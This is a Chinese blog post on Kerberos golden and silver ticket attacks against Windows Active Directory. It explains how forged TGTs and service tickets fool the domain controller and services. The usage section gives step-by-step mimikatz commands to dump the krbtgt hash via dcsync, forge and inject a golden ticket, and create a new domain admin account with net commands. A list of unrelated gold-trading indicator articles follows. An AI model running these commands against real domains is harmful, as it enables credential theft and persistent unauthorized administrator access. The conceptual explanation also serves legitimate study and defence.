首页 > 其他分享 >黄金票据 白银票据

黄金票据 白银票据

时间:2024-03-25 09:58:38浏览次数:10  
标签:白银 session 票据 key 攻击者 黄金 伪造 客户端

  • 票据是为了做一个权限维持
  • 如果管理员更改密码了 可以用票据登录

image.png

  • 黄金票据就是伪造的身份票据 是伪造的as颁发的TGT 身份票据
  • 白银票据是伪造的服务票据 是伪造的tgs颁发的ST 服务票据

黄金票据

  • 与KDC(密钥分发中心)交互 不与as交互
  • 黄金票据伪造的就是TGT1 和TGT2
  • 条件
    1、域名称
    2、域的SID值
    3、域的KRBTGT账号的HASH
    4、伪造任意用户名
  • 为什么能骗过域控的tgs服务
    • 因为伪造的是TGT1和TGT2
    • TGT1中包含的session key(as)是伪造的 客户端的ntlm也是伪造的
    • TGT2中包含的session key(as)也是伪造的 客户端信息是攻击者信息 域krbtgt的ntlm HASH已经知道了 加密的时候是用的真实的ntlm
    • 生成的认证因子1其中的客户端信息是攻击者信息加密的方式也是session key(as)是伪造的
    • 在第4步tgs解密TGT2的时候 得到的是伪造的session key(as) 用家的session key(as)解密认证因子 得到的客户端信息是攻击者的信息 与 TGT2中解密出的信息一致 接下来的步骤则都为真实了

白银票据

  • 不与KDC交互 只与服务器交互
  • 白银票据伪造的是tgs发送的ST 服务票据
  • 条件
    1.域名
    2.域sid
    3.目标服务器名
    4.可利用的服务
    5.服务账号的NTML HASH
    6.需要伪造的用户名
  • 为什么能骗过应用服务器
    • 直接伪造的是TGT4和认证因子2
    • TGT4中的session key(tgs)是伪造的 其中的客户端信息是攻击者信息 加密的服务的ntlm是真实的早知道的
    • 认证因子2中的客户端信息是攻击者的 加密用的session key(tgs)是伪造的
    • 服务器得到TGT4和认证因子2后解密TGT4 用的是自己的ntlm 与攻击者早得到的是一致的 所以解密成功 得到的sessions key(as)是伪造的
    • 用伪造的sessions key(as)解密认证因子2一定能成功 得到的客户端信息与TGT4中的客户端信息相同 就直接提供服务了

黄金票据利用方式

1、在普通域用户中使用mimikatz生成黄金票据.kirbi文件并保存
要进入猕猴桃所在的目录 管理员打开

privilege::debug  
lsadump::lsa /patch

image-20230404110133160

mimikatz log "lsadump::dcsync /domain:xiusafe /user:krbtgt"//导出NTLM哈希
kerberos::golden /user:administrator /domain:xiusafe.com /sid:S-1-5-21-3818247987-2711466351-3365387365 /
krbtgt:5eadd5a4f3a4861f8e887310db890002 /ticket:ticket.kirbi


/user:需要伪造的域管理员用户
/domain:域名称
/sid:SID值,(这里要是使用系统命令的话抓到是这样的SID,最后面的值代表着这个账号的SID值,注意是去掉最后一个-后面的值!)
/krbtgt:krbtgt的HASH值
/ticket:生成的票据名称

image-20230404112022330

2、清除票据

kerberos::purge   \\清除票据  
kerberos::tgt     \\查看票据

3、导入票据

kerberos::ptt ticket.kirbi

4、创建域管

net user a !@#qwe123 /add /domain  创建域用户
net group "domain admins" a /add /domain  加入域控组

黄金票据与白银票据的区别

获取的权限不同

金票:伪造的TGT,可以获取任意Kerberos的访问权限

银票:伪造的ST,只能访问指定的服务,如CIFS

认证流程不同

金票:同KDC交互,但不同AS交互

银票:不同KDC交互,直接访问Server

加密方式不同

金票:由krbtgt NTLM Hash 加密

银票:由服务账号 NTLM Hash 加密

标签:白银,session,票据,key,攻击者,黄金,伪造,客户端
From: https://blog.csdn.net/duolaAmeng0_0/article/details/137005038

相关文章

  • 外汇量化交易新手篇—获取实时外汇行情、黄金行情、贵金属行情数据的方法
    在外汇交易中,获取实时外汇行情、黄金行情、贵金属行情数据可以通过以下方法进行:外汇交易平台:大多数外汇交易平台都提供实时的外汇、黄金、贵金属等行情数据。您可以在交易平台上查看实时报价,监控市场走势并进行交易操作。常用的外汇交易平台包括MetaTrader4(MT4)、MetaTrader......
  • 黑铁、青铜、白银、黄金、铂金、钻石个人等级划分(18级)
    等级1黑铁I段位:0-49积分。等级2黑铁II段位:50-99积分。等级3黑铁III段位:100-149积分,获得一枚一星金凤奖章。等级4青铜I段位:150-199积分。等级5青铜II段位:200-249积分。等级6青铜III段位:250-349积分,获得一枚二星金凤奖章。等级7白银I段位:350-449积分。等级8白银II段位:450-549积分......
  • 黑铁、青铜、白银、黄金、铂金、钻石等级划分
    等级1黑铁I段位:0-49积分。等级2黑铁II段位:50-99积分。等级3黑铁III段位:100-149积分。等级4黑铁IV段位:150-199积分。等级5黑铁V段位:200-299积分,获得一枚一星金凤奖章。299等级6青铜I段位:250-299积分。等级7青铜II段位:300-349积分。等级8青铜III段位:350-399积分。等级9青铜IV段位:40......
  • 比特币再创新高,突破72000美元,将超越黄金
    在早些时候短暂跌破68000美元后,周一欧盘,比特币一度突破72000美元大关,最高涨至72391.90美元,创下新的历史新高,市值升至1.398万亿美元,超越白银成为全球市值第八大资产。此外,以太坊也突破4000美元大关,为2021年12月以来首次,年内累涨逾70%。在上周五和周末,比特币都曾多次上探7万美......
  • 2024最新华为OD机试试题库全 -【小华最多能得到多少克黄金】- C卷
    1.......
  • 通达信黄金启动副图指标公式源码
    {通达信黄金启动副图指标公式源码}启动买入:=DYNAINFO(4)>0ANDHHV(HIGH,10)/LLV(LOW,10)<1.25ANDREF(CLOSE,1)<(LLV(LOW,15)+(HHV(HIGH,15)-LLV(LOW,15))*0.85)ANDCLOSE>OPENANDCLOSE>=HHV(HIGH,10);AA:=EMA(C,5),COLORBLUE;BB:=EMA(C,10),COLORBLUE;CC:=EMA(C,......
  • 通达信钻石黄金操盘指标公式源码
    {通达信钻石黄金操盘指标公式源码}  N:=5;N1:=21;VAR1:=4*SMA((CLOSE-LLV(LOW,N))/(HHV(HIGH,N)-LLV(LOW,N))*100,5,1)-3*Sma(SMA((CLOSE-LLV(LOW,N))/(HHV(HIGH,N)-LLV(LOW,N))*100,5,1),3.2,1),COLORYELLOW,LINETHICK1;VAR2:=8,COLORGREEN,LINETHICK0;尝试买:I......
  • 通达信千载难买黄金坑,黄金坑群来了源码
    {通达信千载难买黄金坑,黄金坑群来了源码}RSV1:=(CLOSE-LLV(LOW,21))/(HHV(HIGH,21)-LLV(LOW,21))*100; RSV2:=(CLOSE-LLV(LOW,37))/(HHV(HIGH,37)-LLV(LOW,37))*100; 短线:SMA(SMA(RSV1,3,1),3,1)+3*STD(CLOSE,21),COLOR00FF00;中线:SMA(RSV2,5,1)+2*STD(CLOSE,37),COLO......
  • 通达信黄金启动指标公式源码副图
    {通达信黄金启动指标公式源码副图}启动买入:=DYNAINFO(4)>0ANDHHV(HIGH,10)/LLV(LOW,10)<1.25ANDREF(CLOSE,1)<(LLV(LOW,15)+(HHV(HIGH,15)-LLV(LOW,15))*0.85)ANDCLOSE>OPENANDCLOSE>=HHV(HIGH,10);AA:=Ema(C,5),COLORBLUE;BB:=EMA(C,10),COLORBLUE;CC:=EMA(C,1......
  • P8598 [蓝桥杯 2013 省 AB] 错误票据 题解
    思路考虑将\(id\)从小到大排序,然后从\(2\)下标开始扫描一遍\(id\)数组,若当前的\(id_i-id_{i-1}>1\),则说明当前\(id\)存在断号,输出\(id_i-1\);若当前的\(id_i=id_{i-1}\),则说明当前\(id\)存在重号,输出\(id_i\)。注意断号与重号需要分开计算。#include<b......